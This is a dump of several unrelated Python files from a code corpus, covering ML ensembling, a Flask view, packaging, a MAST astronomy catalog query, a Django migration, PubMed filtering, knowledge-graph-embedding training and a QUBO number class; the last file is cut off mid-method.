    parser.add_argument('--output_dir', type=str, default=None)
    parser.add_argument('--mode', type=str, default='test')
    parser.add_argument('--test_file', type=str, default='test.tsv')
    parser.add_argument('--text_only', type=_str2bool, default=True)
    parser.add_argument('--train_blender', type=_str2bool, default=True)
    args = parser.parse_args(args)
    return args
if __name__ == '__main__':
    # Ensemble driver: average (and optionally blend) per-run BERT class
    # probabilities found under <output_dir>/0..9 and write prediction CSVs.
    parser = argparse.ArgumentParser()
    args = parse_arguments(parser)
    assert (args.data_dir)

    # Import the real test data
    test_df = pd.read_csv(args.data_dir + '/test.csv')

    # Importing the event code dictionary to convert the BERT indices
    code_df = pd.read_csv(args.data_dir + '/code_dict.csv')
    code_dict = dict(zip(code_df.value, code_df.event_code))

    # Importing the scores from the 4 BERT runs
    # NOTE(review): run_folder is assigned but never used below — presumably
    # it was meant to be part of the glob path; confirm.
    if args.mode == 'validate':
        run_folder = 'val_runs'
    elif args.mode == 'test':
        run_folder = 'test_runs'
    prob_list = []
    for fn in sorted(glob(args.output_dir + '/[0-9]')):
        print(fn)
        run_probs = np.array(
            pd.read_csv(fn + '/test_results.tsv', sep='\t', header=None))
        # Per-run hard predictions, written next to that run's scores.
        test_df['event'] = [
            code_dict[code] for code in np.argmax(run_probs, axis=1)
        ]
        test_df.to_csv(fn + '/solution.csv', header=True, index=False)
        prob_list.append(run_probs)
    assert (prob_list)
    prob_list = np.array(prob_list)

    # Grouping the probabilities for regular averaging
    avg_probs = np.mean(prob_list, axis=0)
    # NOTE(review): debug print of the full probability matrix — consider removing.
    print(avg_probs)
    # Each averaged row must still sum to 1 (a valid distribution).
    assert (np.allclose(np.sum(avg_probs, axis=1), np.ones(test_df.shape[0])))
    avg_guesses = np.array(
        [code_dict[code] for code in np.argmax(avg_probs, axis=1)])

    # Grouping the probabilities for blending
    wide_probs = np.concatenate(prob_list, axis=1)

    # Producing guesses when only the input text is available
    if args.text_only:
        # Loading the blender model
        # lgr = joblib.load(args.data_dir + 'blender.joblib')
        # blend_guesses = lgr.predict(wide_probs)
        # blend_probs = np.max(lgr.predict_proba(wide_probs), axis=1)
        # print(blend_probs[0])

        # Exporting the guesses to disk
        ids = pd.read_csv(args.data_dir + '/' + args.test_file, sep='\t')['id']
        guess_df = pd.DataFrame(
            pd.concat([
                ids,
                pd.Series(avg_guesses),
                pd.Series(np.max(avg_probs, axis=1))
            ],
                      axis=1))
        guess_df.columns = ['id', 'avg_guess', 'avg_prob']
        guess_df.to_csv(args.output_dir + '/guesses.csv',
                        header=True,
                        index=False)
        test_df['event'] = avg_guesses
        test_df.to_csv(args.output_dir + '/solution.csv',
                       header=True,
                       index=False)

    # Producing guesses and scores when the labels are also available
    else:
        # NOTE(review): this branch references LogisticRegression, joblib and
        # f1_score, none of which are imported in this file — it raises
        # NameError as written (sklearn/joblib imports are missing).
        # Getting the guesses from the blending model
        if args.train_blender:
            targets = pd.read_csv(args.data_dir + '/' +
                                  args.test_file)['event']
            lgr = LogisticRegression()
            lgr.fit(wide_probs, targets)
            joblib.dump(lgr, args.data_dir + 'blender.joblib')
        else:
            lgr = joblib.load(args.data_dir + 'blender.joblib')
        blend_guesses = lgr.predict(wide_probs)

        # Importing the test records and getting the various scores
        # NOTE(review): paths in this branch concatenate without '/'
        # (args.data_dir + 'results.csv'); data_dir must end with a
        # separator here — confirm.
        test_records = pd.read_csv(args.data_dir + args.test_file)
        targets = np.array(test_records.event)
        avg_f1 = f1_score(targets, avg_guesses, average='weighted')
        blend_f1 = f1_score(targets, blend_guesses, average='weighted')
        print('')
        print('Weighted macro f1 on the test set is ' + str(avg_f1) +
              ' with averaging and ' + str(blend_f1) + ' with blending.')

        # Writing results to disk
        results = pd.DataFrame(
            pd.concat([
                test_records.id, test_records.text, test_records.event,
                pd.Series(avg_guesses),
                pd.Series(blend_guesses)
            ],
                      axis=1))
        results.columns = ['id', 'text', 'event', 'avg_guess', 'blend_guess']
        results.to_csv(args.data_dir + 'results.csv', header=True, index=False)
4866049 | <filename>app/main/views.py
from flask import Blueprint, render_template
from app.models import EditableHTML, UsefulLink
main = Blueprint('main', __name__)
@main.route('/')
def index():
useful_links = UsefulLink.query.all()
return render_template('main/index.html',
useful_links=useful_links
)
@main.route('/about')
def about():
    """Render the admin-editable 'about' page."""
    content = EditableHTML.get_editable_html('about')
    return render_template('main/about.html', editable_html_obj=content)
| StarcoderdataPython |
176169 | from setuptools import setup
# Packaging metadata for the padacioso intent parser.
setup(
    name='padacioso',
    version='0.1.1',
    packages=['padacioso'],
    url='https://github.com/OpenJarbas/padacioso',
    license='apache-2.0',
    author='jarbasai',
    author_email='<EMAIL>',
    install_requires=["simplematch"],  # the only runtime dependency
    description='dead simple intent parser'
)
| StarcoderdataPython |
6633769 | <reponame>mmfausnaugh/tica<filename>wcs_build/mast_filter_conesearch.py<gh_stars>0
import numpy as np
import sys
import json
import time
try: # Python 3.x
from urllib.parse import quote as urlencode
from urllib.request import urlretrieve
from urllib.parse import urlencode as dict_urlencode
from urllib.request import urlopen
except ImportError: # Python 2.x
from urllib import pathname2url as urlencode
from urllib import urlretrieve
from urllib import urlencode as dict_urlencode
from urllib import urlopen
try: # Python 3.x
import http.client as httplib
except ImportError: # Python 2.x
import httplib
## [Mast Query]
def mastQuery(request):
    """POST a MAST service request dict to the MAST API over HTTPS.

    Returns a (headers, content) pair, where content is the UTF-8 decoded
    response body.
    """
    host = 'mast.stsci.edu'
    py_version = ".".join(map(str, sys.version_info[:3]))

    headers = {"Content-type": "application/x-www-form-urlencoded",
               "Accept": "text/plain",
               "User-agent": "python-requests/" + py_version}

    # The service expects the JSON request URL-encoded under 'request='.
    payload = "request=" + urlencode(json.dumps(request))

    conn = httplib.HTTPSConnection(host)
    conn.request("POST", "/api/v0/invoke", payload, headers)
    resp = conn.getresponse()
    head = resp.getheaders()
    content = resp.read().decode('utf-8')
    conn.close()

    return head, content
def mast_filter_conesearch(starRa, starDec, radius, minTmag, maxTmag):
# Do a MAST cone search around the ra and dec to get the nearby stars
startTime = time.time()
request = {'service':'Mast.Catalogs.Filtered.Tic.Position.Rows', \
'params':{'columns':'ID,ra,dec,Tmag,Kmag,GAIAmag,pmRA,pmDEC', \
'filters':[ \
{'paramName':'Tmag',\
'values':[{'min':minTmag, 'max':maxTmag}]},\
{'paramName':'pmRA',\
'values':[{'min':-100.0, 'max':100.0}]}, \
{'paramName':'pmDEC',\
'values':[{'min':-100.0, 'max':100.0}]}], \
'ra':'{:10.5f}'.format(starRa),\
'dec':'{:10.5f}'.format(starDec),\
'radius':'{:10.7f}'.format(radius/3600.0) \
}, \
'format':'json', 'removenullcolumns':False}
while True:
headers, outString = mastQuery(request)
try:
outObject = json.loads(outString)
if outObject['status'] != 'EXECUTING':
break
except:
print('Problem at MAST. Resting and trying again')
time.sleep(10)
if time.time() - startTime > 30:
print('Working...')
startTime = time.time()
time.sleep(5)
try:
ticList = np.array([x['ID'] for x in outObject['data']], dtype=np.int64)
ticRas = np.array([x['ra'] for x in outObject['data']], dtype=np.float)
ticDecs = np.array([x['dec'] for x in outObject['data']], dtype=np.float)
ticTmags = np.array([x['Tmag'] for x in outObject['data']], dtype=np.float)
ticKmags = np.array([x['Kmag'] for x in outObject['data']], dtype=np.float)
ticGmags = np.array([x['GAIAmag'] for x in outObject['data']], dtype=np.float)
ticpmRA = np.array([x['pmRA'] for x in outObject['data']], dtype=np.float)
ticpmDec = np.array([x['pmDEC'] for x in outObject['data']], dtype=np.float)
except:
# Try rerunning search
while True:
headers, outString = mastQuery(request)
try:
outObject = json.loads(outString)
if outObject['status'] != 'EXECUTING':
break
except:
print('Problem at MAST. Resting and trying again')
time.sleep(20)
if time.time() - startTime > 30:
print('Working...')
startTime = time.time()
time.sleep(5)
try:
ticList = np.array([x['ID'] for x in outObject['data']], dtype=np.int64)
ticRas = np.array([x['ra'] for x in outObject['data']], dtype=np.float)
ticDecs = np.array([x['dec'] for x in outObject['data']], dtype=np.float)
ticTmags = np.array([x['Tmag'] for x in outObject['data']], dtype=np.float)
ticKmags = np.array([x['Kmag'] for x in outObject['data']], dtype=np.float)
ticGmags = np.array([x['GAIAmag'] for x in outObject['data']], dtype=np.float)
ticpmRA = np.array([x['pmRA'] for x in outObject['data']], dtype=np.float)
ticpmDec = np.array([x['pmDEC'] for x in outObject['data']], dtype=np.float)
except:
print('Tried MAST cone search twice and failed. Exiting')
exit()
return ticList, ticRas, ticDecs, ticTmags, ticKmags, ticGmags, ticpmRA, ticpmDec
| StarcoderdataPython |
3313450 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-10-03 16:51
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
# Django 2.0 requires this for renaming models in SQLite
# https://stackoverflow.com/questions/48549068/django-db-utils-notsupportederror-in-sqlite-why-not-supported-in-sqlite
atomic = False
dependencies = [
('entrance', '0048_userpaticipatedinschoolentrancestep'),
]
operations = [
migrations.RenameModel(
old_name='UserPaticipatedInSchoolEntranceStep',
new_name='UserParticipatedInSchoolEntranceStep',
),
]
| StarcoderdataPython |
8011587 | <gh_stars>10-100
"""
Extract a set of doc ids from the pubmed xml files.
"""
import argparse
import glob
import gzip
import multiprocessing
import os
from functools import partial
from multiprocessing import Pool
import sys
from lxml import etree
def parse_pubmeds(pmids: list, file: str) -> str:
"""
:param pmids:
:param file:
:return:
"""
data = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE PubmedArticleSet SYSTEM "http://dtd.nlm.nih.gov/ncbi/pubmed/out/pubmed_170101.dtd">
<PubmedArticleSet>
{}
</PubmedArticleSet>
"""
print(file)
decompressed_file = gzip.GzipFile(file, mode='rb')
tree = etree.parse(decompressed_file)
root = tree.getroot()
for node in root.findall('PubmedArticle'):
pmid = node.find('MedlineCitation').find('PMID').text
if pmid in pmids:
print(pmid)
file_data = data.format(
etree.tostring(node, encoding='unicode', method='xml', pretty_print=True))
with open('/datadrive2/pubmed_filter/{}.xml'.format(pmid), 'w') as f:
f.write(file_data)
if __name__ == '__main__':
argparser = argparse.ArgumentParser()
argparser.add_argument('--pmids', help='Location of pmids file.',
type=argparse.FileType('r'), default=sys.stdin)
argparser.add_argument('--pubmed', help='Location of pubmed gzip files.',
type=str, required=True)
args = argparser.parse_args()
parse_partial = partial(parse_pubmeds, [x.strip() for x in args.pmids.readlines()])
print(list(glob.glob(os.path.join(args.pubmed, '*.xml.gz'))))
p = Pool(multiprocessing.cpu_count() - 1 or 1)
p.map(parse_partial, list(glob.glob(os.path.join(args.pubmed, '*.xml.gz'))))
p.close()
p.join()
| StarcoderdataPython |
9614570 | <reponame>HW-AARC-CLUB/DensE
#!/usr/bin/python3
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import json
import logging
import os
import random
import numpy as np
import torch
from torch.utils.data import DataLoader
from torch.optim.lr_scheduler import ReduceLROnPlateau
from model import DensEModel
from dataloader import TrainDataset
from dataloader import BidirectionalOneShotIterator
def parse_args(args=None):
    """Build and parse the command line for training/testing a KGE model.

    :param args: optional argv list; defaults to sys.argv.
    :return: the parsed argparse.Namespace.
    """
    ap = argparse.ArgumentParser(
        description='Training and Testing Knowledge Graph Embedding Models',
        usage='train.py [<args>] [-h | --help]'
    )

    # Run modes and hardware.
    ap.add_argument('--cuda', action='store_true', help='use GPU')
    ap.add_argument('--do_train', action='store_true')
    ap.add_argument('--do_valid', action='store_true')
    ap.add_argument('--do_test', action='store_true')
    ap.add_argument('--evaluate_train', action='store_true', help='Evaluate on training data')

    # Dataset options.
    ap.add_argument('--countries', action='store_true', help='Use Countries S1/S2/S3 datasets')
    ap.add_argument('--regions', type=int, nargs='+', default=None,
                    help='Region Id for Countries S1/S2/S3 datasets, DO NOT MANUALLY SET')
    ap.add_argument('--data_path', type=str, default=None)

    # Model hyperparameters.
    ap.add_argument('--model', default='TransE', type=str)
    ap.add_argument('-me', '--entity_embedding_has_mod', action='store_true')
    ap.add_argument('-mr', '--relation_embedding_has_mod', action='store_true')
    ap.add_argument('-n', '--negative_sample_size', default=128, type=int)
    ap.add_argument('-d', '--hidden_dim', default=500, type=int)
    ap.add_argument('-g', '--gamma', default=12.0, type=float)
    ap.add_argument('-adv', '--negative_adversarial_sampling', action='store_true')
    ap.add_argument('-a', '--adversarial_temperature', default=1.0, type=float)

    # Optimization.
    ap.add_argument('-b', '--batch_size', default=1024, type=int)
    ap.add_argument('-r', '--regularization', default=0.0, type=float)
    ap.add_argument('--test_batch_size', default=4, type=int, help='valid/test batch size')
    ap.add_argument('--uni_weight', action='store_true',
                    help='Otherwise use subsampling weighting like in word2vec')
    ap.add_argument('-lr', '--learning_rate', default=0.0001, type=float)
    ap.add_argument('-cpu', '--cpu_num', default=40, type=int)

    # Checkpointing and logging.
    ap.add_argument('-init', '--init_checkpoint', default=None, type=str)
    ap.add_argument('-save', '--save_path', default=None, type=str)
    ap.add_argument('--max_steps', default=1000000, type=int)
    ap.add_argument('--warm_up_steps', default=None, type=int)
    ap.add_argument('--save_checkpoint_steps', default=1000, type=int)
    ap.add_argument('--valid_steps', default=1000, type=int)
    ap.add_argument('--log_steps', default=500, type=int, help='train log every xx steps')
    ap.add_argument('--test_log_steps', default=1000, type=int, help='valid/test log every xx steps')

    # Derived values, filled in at runtime.
    ap.add_argument('--nentity', type=int, default=0, help='DO NOT MANUALLY SET')
    ap.add_argument('--nrelation', type=int, default=0, help='DO NOT MANUALLY SET')
    ap.add_argument('--study_valid_id', type=int, default=0, help='relation_id_to_study in valid')

    return ap.parse_args(args)
def override_config(args):
'''
Override model and data configuration
'''
with open(os.path.join(args.init_checkpoint, 'config.json'), 'r') as fjson:
argparse_dict = json.load(fjson)
args.countries = argparse_dict['countries']
if args.data_path is None:
args.data_path = argparse_dict['data_path']
args.model = argparse_dict['model']
args.entity_embedding_has_mod = argparse_dict['entity_embedding_has_mod']
args.relation_embedding_has_mod = argparse_dict['relation_embedding_has_mod']
args.hidden_dim = argparse_dict['hidden_dim']
args.test_batch_size = argparse_dict['test_batch_size']
args.gamma = argparse_dict['gamma']
def save_model(model, optimizer, save_variable_list, args):
    """Write the full training state to args.save_path.

    Saves config.json (the argparse settings), a torch 'checkpoint' file
    (model + optimizer state plus *save_variable_list*), and each embedding
    table as a separate .npy file.
    """
    with open(os.path.join(args.save_path, 'config.json'), 'w') as fjson:
        json.dump(vars(args), fjson)

    checkpoint = dict(save_variable_list)
    checkpoint['model_state_dict'] = model.state_dict()
    checkpoint['optimizer_state_dict'] = optimizer.state_dict()
    torch.save(checkpoint, os.path.join(args.save_path, 'checkpoint'))

    def _dump(name, embedding):
        # Embeddings are exported as plain numpy arrays for offline analysis.
        np.save(os.path.join(args.save_path, name),
                embedding.weight.data.detach().cpu().numpy())

    _dump('entity_x', model.entity_x)
    _dump('entity_y', model.entity_y)
    _dump('entity_z', model.entity_z)
    _dump('relation_w', model.relation_w)
    _dump('relation_x', model.relation_x)
    _dump('relation_y', model.relation_y)
    _dump('relation_z', model.relation_z)
def read_triple(file_path, entity2id, relation2id):
    """Read tab-separated (head, relation, tail) triples and map them to ids."""
    with open(file_path) as fin:
        return [
            (entity2id[h], relation2id[r], entity2id[t])
            for h, r, t in (line.strip().split('\t') for line in fin)
        ]
def set_logger(args):
    """Route log records both to a file in the run directory and the console.

    Uses train.log for training runs and test.log otherwise; the directory is
    args.save_path, falling back to args.init_checkpoint.
    """
    log_dir = args.save_path or args.init_checkpoint
    log_name = 'train.log' if args.do_train else 'test.log'
    log_file = os.path.join(log_dir, log_name)

    # File handler via basicConfig (overwrites any previous log).
    logging.basicConfig(
        format='%(asctime)s %(levelname)-8s %(message)s',
        level=logging.INFO,
        datefmt='%Y-%m-%d %H:%M:%S',
        filename=log_file,
        filemode='w'
    )

    # Mirror everything to the console with the same format.
    console = logging.StreamHandler()
    console.setLevel(logging.INFO)
    console.setFormatter(logging.Formatter('%(asctime)s %(levelname)-8s %(message)s'))
    logging.getLogger('').addHandler(console)
def log_metrics(mode, step, metrics):
    """Log every metric in *metrics* as '<mode> <name> at step <step>: <value>'."""
    for name, value in metrics.items():
        logging.info('%s %s at step %d: %f' % (mode, name, step, value))
def make_additional_symmetric_fake_graph(train_trip, max_node_id):
    """Duplicate the graph with a mirrored copy on a shifted node-id range.

    For every (h, r, t) the output keeps the original triple and appends
    (t + max_node_id, r, h + max_node_id): the reversed edge between the
    shifted copies of the two endpoints.
    """
    doubled = []
    for h, r, t in train_trip:
        doubled.append((h, r, t))
        doubled.append((t + max_node_id, r, h + max_node_id))
    return doubled
def reciprocal_fake_graph(input_trip, n_relation):
    """Insert a reciprocal edge (t, r + n_relation, h) after every triple.

    Returns a pair: the augmented list (original and reciprocal triples
    interleaved) and the list containing only the reciprocal triples.
    """
    augmented, reciprocals = [], []
    for h, r, t in input_trip:
        inverse = (t, r + n_relation, h)
        augmented.append((h, r, t))
        augmented.append(inverse)
        reciprocals.append(inverse)
    return augmented, reciprocals
def add_star_node(max_node_id, nentity, max_rel_id):
    """Connect every node id below *max_node_id* to a hub node, both ways.

    The hub is node *nentity* and all star edges use relation
    *max_rel_id*; each node contributes (node -> hub) then (hub -> node).
    """
    star_edges = []
    for node in range(max_node_id):
        star_edges.extend(((node, max_rel_id, nentity), (nentity, max_rel_id, node)))
    return star_edges
def main(args):
    """End-to-end driver: train and/or evaluate a knowledge-graph-embedding model.

    Validates the mode flags on ``args``, loads the entity/relation
    dictionaries and the train/valid/test triples, augments the graph with
    reciprocal relations (doubling the relation vocabulary), builds the
    model, optionally runs the training loop with periodic validation, and
    finally evaluates on the requested splits.
    """
    if (not args.do_train) and (not args.do_valid) and (not args.do_test):
        raise ValueError('one of train/val/test mode must be choosed.')
    if args.init_checkpoint:
        # Resuming from a checkpoint: adopt the hyper-parameters stored with it.
        override_config(args)
    elif args.data_path is None:
        raise ValueError('one of init_checkpoint/data_path must be choosed.')
    if args.do_train and args.save_path is None:
        raise ValueError('Where do you want to save your trained model?')
    if args.save_path and not os.path.exists(args.save_path):
        os.makedirs(args.save_path)
    # Write logs to checkpoint and console
    set_logger(args)
    # entities.dict / relations.dict hold one "<id>\t<name>" pair per line.
    with open(os.path.join(args.data_path, 'entities.dict')) as fin:
        entity2id = dict()
        for line in fin:
            eid, entity = line.strip().split('\t')
            entity2id[entity] = int(eid)
    with open(os.path.join(args.data_path, 'relations.dict')) as fin:
        relation2id = dict()
        for line in fin:
            rid, relation = line.strip().split('\t')
            relation2id[relation] = int(rid)
    # Read regions for Countries S* datasets
    if args.countries:
        regions = list()
        with open(os.path.join(args.data_path, 'regions.list')) as fin:
            for line in fin:
                region = line.strip()
                regions.append(entity2id[region])
        args.regions = regions
    nentity = len(entity2id)
    # Doubled: every relation gets a reciprocal twin whose id is shifted by
    # len(relation2id) (see reciprocal_fake_graph).
    nrelation = len(relation2id) * 2
    args.nentity = nentity
    args.nrelation = nrelation
    logging.info('Model: %s' % args.model)
    logging.info('Data Path: %s' % args.data_path)
    logging.info('Evaluating on Valid Dataset specific relation ID %d' %(args.study_valid_id))
    logging.info('#entity: %d' % nentity)
    logging.info('#relation: %d' % nrelation)
    # _-prefixed lists hold the original (non-reciprocal) triples; they are
    # the ones passed to test_step for evaluation.
    _train_triples = read_triple(os.path.join(args.data_path, 'train.txt'), entity2id, relation2id)
    _valid_triples = read_triple(os.path.join(args.data_path, 'valid.txt'), entity2id, relation2id)
    _test_triples = read_triple(os.path.join(args.data_path, 'test.txt'), entity2id, relation2id)
    _all_true_triples = _train_triples + _valid_triples + _test_triples
    logging.info('#real_train: %d' % len(_train_triples))
    logging.info('#real_valid: %d' % len(_valid_triples))
    logging.info('#real_test: %d' % len(_test_triples))
    # Each *_triples below is a pair: (augmented triples, reciprocal-only triples).
    train_triples = reciprocal_fake_graph(_train_triples, len(relation2id))
    valid_triples = reciprocal_fake_graph(_valid_triples, len(relation2id))
    test_triples = reciprocal_fake_graph(_test_triples, len(relation2id))
    logging.info('#train: %d' % len(train_triples[0]))
    logging.info('#valid: %d' % len(valid_triples[0]))
    logging.info('#test: %d' % len(test_triples[0]))
    #All true triples
    all_true_triples = train_triples[0] + valid_triples[0] + test_triples[0]
    reciprocal_all_true_triples = train_triples[1] + valid_triples[1] + test_triples[1]
    kge_model = DensEModel(
        model_name=args.model,
        nentity=nentity,
        nrelation=nrelation,
        hidden_dim=args.hidden_dim,
        gamma=args.gamma,
        entity_embedding_has_mod=args.entity_embedding_has_mod,
        relation_embedding_has_mod=args.relation_embedding_has_mod
    )
    logging.info('Model Parameter Configuration:')
    for name, param in kge_model.named_parameters():
        logging.info('Parameter %s: %s, require_grad = %s' % (name, str(param.size()), str(param.requires_grad)))
    if args.cuda:
        kge_model = kge_model.cuda()
    if args.do_train:
        # Set training dataloader iterator
        train_dataloader_head = DataLoader(
            TrainDataset(train_triples[0], all_true_triples, nentity, nrelation, args.negative_sample_size, 'head-batch'),
            batch_size=args.batch_size,
            shuffle=True,
            num_workers=max(1, args.cpu_num//2),
            collate_fn=TrainDataset.collate_fn
        )
        train_dataloader_tail = DataLoader(
            TrainDataset(train_triples[0], all_true_triples, nentity, nrelation, args.negative_sample_size, 'tail-batch'),
            batch_size=args.batch_size,
            shuffle=True,
            num_workers=max(1, args.cpu_num//2),
            collate_fn=TrainDataset.collate_fn
        )
        train_iterator = BidirectionalOneShotIterator(train_dataloader_head, train_dataloader_tail)
        # Set training configuration
        current_learning_rate = args.learning_rate
        optimizer = torch.optim.Adam(
            filter(lambda p: p.requires_grad, kge_model.parameters()),
            lr=current_learning_rate
        )
        # Halve the LR when the training loss plateaus (in addition to the
        # manual warm-up decay below).
        scheduler = ReduceLROnPlateau(
            optimizer, "min", patience=1000, verbose=True, factor=0.5, cooldown=500, min_lr=0.0000002)
        if args.warm_up_steps:
            warm_up_steps = args.warm_up_steps
        else:
            warm_up_steps = args.max_steps // 2
    if args.init_checkpoint:
        # Restore model from checkpoint directory
        logging.info('Loading checkpoint %s...' % args.init_checkpoint)
        checkpoint = torch.load(os.path.join(args.init_checkpoint, 'checkpoint'))
        init_step = checkpoint['step']
        kge_model.load_state_dict(checkpoint['model_state_dict'])
        if args.do_train:
            current_learning_rate = checkpoint['current_learning_rate']
            warm_up_steps = checkpoint['warm_up_steps']
            optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
    else:
        logging.info('Ramdomly Initializing %s Model...' % args.model)
        init_step = 0
    step = init_step
    logging.info('Start Training...')
    logging.info('init_step = %d' % init_step)
    logging.info('batch_size = %d' % args.batch_size)
    logging.info('negative_adversarial_sampling = %d' % args.negative_adversarial_sampling)
    logging.info('hidden_dim = %d' % args.hidden_dim)
    logging.info('gamma = %f' % args.gamma)
    # NOTE(review): negative_adversarial_sampling is logged twice (as %d above
    # and %s here); likely only one line was intended.
    logging.info('negative_adversarial_sampling = %s' % str(args.negative_adversarial_sampling))
    logging.info('entity_embedding_has_mod = %s' % args.entity_embedding_has_mod)
    logging.info('relation_embedding_has_mod = %s' % str(args.relation_embedding_has_mod))
    if args.negative_adversarial_sampling:
        logging.info('adversarial_temperature = %f' % args.adversarial_temperature)
    # Set valid dataloader as it would be evaluated during training
    if args.do_train:
        # NOTE(review): %d truncates fractional learning rates in this log line.
        logging.info('learning_rate = %d' % current_learning_rate)
        training_logs = []
        max_mrr = 0.
        #Training Loop
        for step in range(init_step, args.max_steps):
            log = kge_model.train_step(kge_model, optimizer, train_iterator, step, args)
            scheduler.step(log['loss'])
            training_logs.append(log)
            if step >= warm_up_steps:
                # Warm-up boundary reached: decay the LR tenfold, rebuild the
                # optimizer, and push the next boundary further out.
                current_learning_rate = current_learning_rate / 10
                logging.info('Change learning_rate to %f at step %d' % (current_learning_rate, step))
                optimizer = torch.optim.Adam(
                    filter(lambda p: p.requires_grad, kge_model.parameters()),
                    lr=current_learning_rate
                )
                warm_up_steps = warm_up_steps * 3
            if step % args.log_steps == 0:
                # Average the accumulated per-step logs, report, and reset.
                metrics = {}
                for metric in training_logs[0].keys():
                    metrics[metric] = sum([log[metric] for log in training_logs])/len(training_logs)
                log_metrics('Training average', step, metrics)
                training_logs = []
            if args.do_valid and (step+1) % args.valid_steps == 0:
                logging.info('Evaluating on Valid Dataset...')
                metrics = kge_model.test_step(kge_model, _valid_triples, _all_true_triples, args)
                log_metrics('Valid', step, metrics)
                if metrics['MRR'] > max_mrr:
                    # Keep only the best-so-far checkpoint (by validation MRR).
                    logging.info('Better Performance on Valid, save model')
                    max_mrr = metrics['MRR']
                    save_variable_list = {
                        'step': step,
                        'current_learning_rate': current_learning_rate,
                        'warm_up_steps': warm_up_steps
                    }
                    save_model(kge_model, optimizer, save_variable_list, args)
        # save_variable_list = {
        #     'step': step,
        #     'current_learning_rate': current_learning_rate,
        #     'warm_up_steps': warm_up_steps
        # }
        # save_model(kge_model, optimizer, save_variable_list, args)
    if args.do_valid:
        logging.info('Evaluating on Valid Dataset...')
        metrics = kge_model.test_step(kge_model, _valid_triples, _all_true_triples, args)
        log_metrics('Valid', step, metrics)
    if args.do_test:
        logging.info('Evaluating on Test Dataset...')
        metrics = kge_model.test_step(kge_model, _test_triples, _all_true_triples, args)
        log_metrics('Test', step, metrics)
    if args.evaluate_train:
        logging.info('Evaluating on Training Dataset...')
        metrics = kge_model.test_step(kge_model, _train_triples, _all_true_triples, args)
        # NOTE(review): this reports the training-set evaluation under the
        # "Test" label — possibly 'Train' was intended.
        log_metrics('Test', step, metrics)
# Script entry point: parse CLI arguments (parse_args is defined elsewhere
# in this file) and run the full train/eval pipeline.
if __name__ == '__main__':
    main(parse_args())
| StarcoderdataPython |
8024558 | from itertools import combinations, product
from qaml.qubo import QUBO
# Create a "Number" that is fixed point, by default a standard integer.
# This number supports operations with other number objects and Python
# integers and floats.
class Number:
    """A fixed-point number encoded over QUBO bits (default: a plain integer).

    Each instance owns a list of bit indices allocated from a parent
    ``Circuit``; bit ``i`` carries the weight ``2**(i + exponent)``, with
    the highest bit negated for two's-complement signed numbers.  The
    class supports +, -, *, ** with other Numbers and with Python
    ints/floats; products between distinct bits are linearized through
    AND gates allocated from the circuit.
    """

    def __init__(self, circuit, bit_indices, exponent, signed, constant=0):
        # Store the provided parameters.
        self.circuit = circuit
        self.bit_indices = bit_indices
        self.exponent = exponent
        self.signed = signed
        self.constant = constant
        self.bits = QUBO()
        # Initialize the number coefficients itself: bit i weighs 2**(i+exponent).
        bits = len(bit_indices)
        for i in range(bits - int(signed)):
            bit = self.bit_indices[i]
            self.bits[bit] = 2**(i + exponent)
        if signed:
            # Two's complement: the top bit carries a negative weight.
            bit = self.bit_indices[bits-1]
            self.bits[bit] = -2**(bits-1 + exponent)
        # Store which values are one-local (representable without ancilla).
        self.one_locals = set(self.bit_indices)

    # Print out information about this number.
    def __str__(self):
        string = "Number:\n"
        string += f"  bit_indices: {self.bit_indices}\n"
        string += f"  exponent:    {self.exponent}\n"
        string += f"  signed:      {self.signed}\n"
        string += f"  bits:        {dict(self.bits)}\n"
        string += f"  constant:    {self.constant}\n"
        string += f"  one_locals:  {self.one_locals}\n"
        max_len_line = max(map(len, string.split("\n")))
        page_break = '-'*max_len_line+"\n"
        return page_break + string + page_break

    # Addition from the right is the same (int + Number, float + Number).
    # BUG FIX: previously called the nonexistent "self._add__", which raised
    # AttributeError whenever a Number appeared on the right of "+".
    def __radd__(self, num): return self.__add__(num)

    # Support addition of another number (or an int/float constant).
    def __add__(self, num):
        """Return a new Number equal to self + num; num may be Number/int/float."""
        # Verify correct usage.
        assert(type(num) in {type(self), int, float})
        # Initialize a new Number object to be returned.
        new_num = Number(self.circuit, self.bit_indices,
                         self.exponent, self.signed, self.constant)
        new_num.bits = self.bits.copy()
        new_num.one_locals = self.one_locals.copy()
        # Generate a new number that is a copy of this one with a
        # different constant term added on.
        if (type(num) in {int, float}):
            new_num.constant += num
        # Perform the addition between the qubits in the QUBO.
        elif (type(num) == type(self)):
            # Add together the coefficients of the two QUBO's for each number.
            for coef in num.bits:
                new_num.bits[coef] = new_num.bits.get(coef, 0) + num.bits[coef]
            # Update the one-local terms track for the new number.
            new_num.one_locals = new_num.one_locals.union(num.one_locals)
            new_num.constant = self.constant + num.constant
        # Return the new number.
        return new_num

    # Support subtraction of another number (delegates to addition of the negation).
    def __sub__(self, num): return self + num.__neg__()

    # Support negation of a number (flips every coefficient and the constant).
    def __neg__(self):
        # Initialize a new Number object to be returned.
        new_num = Number(self.circuit, self.bit_indices,
                         self.exponent, self.signed, -self.constant)
        # Make the QUBO the negation of all values in this QUBO.
        new_num.bits = QUBO({coef:-self.bits[coef] for coef in self.bits})
        new_num.one_locals = self.one_locals.copy()
        return new_num

    # Raise this to a (nonnegative integer) power by repeated multiplication.
    def __pow__(self, exponent):
        num = 1
        for i in range(exponent): num = self * num
        return num

    # Support multiplication with another number (or an int/float scale).
    def __mul__(self, num):
        """Return a new Number equal to self * num.

        Multiplying two Numbers allocates one ancillary bit (plus an AND
        gate in the circuit) per distinct pair of bits so that the product
        stays one-local.
        """
        # Verify correct usage.
        assert(type(num) in {type(self), int, float})
        # Initialize a new Number object to be returned.
        new_num = Number(self.circuit, self.bit_indices,
                         self.exponent, self.signed, self.constant)
        new_num.bits = self.bits.copy()
        new_num.one_locals = self.one_locals.copy()
        # Generate a new number that is a copy of this one with a
        # different constant term multiplied on, also multiply QUBO.
        if (type(num) in {int, float}):
            new_num.constant *= num
            for coef in new_num.bits: new_num.bits[coef] *= num
        # Perform the multiplication between the qubits in the QUBO.
        elif (type(num) == type(self)):
            # First compute all the 1-local terms that require no anicillary bits.
            shared_terms = num.one_locals.intersection(self.one_locals)
            all_terms = self.one_locals.union(num.one_locals)
            for coef in all_terms:
                value = 0
                if coef in self.one_locals: value += self.bits[coef] * num.constant
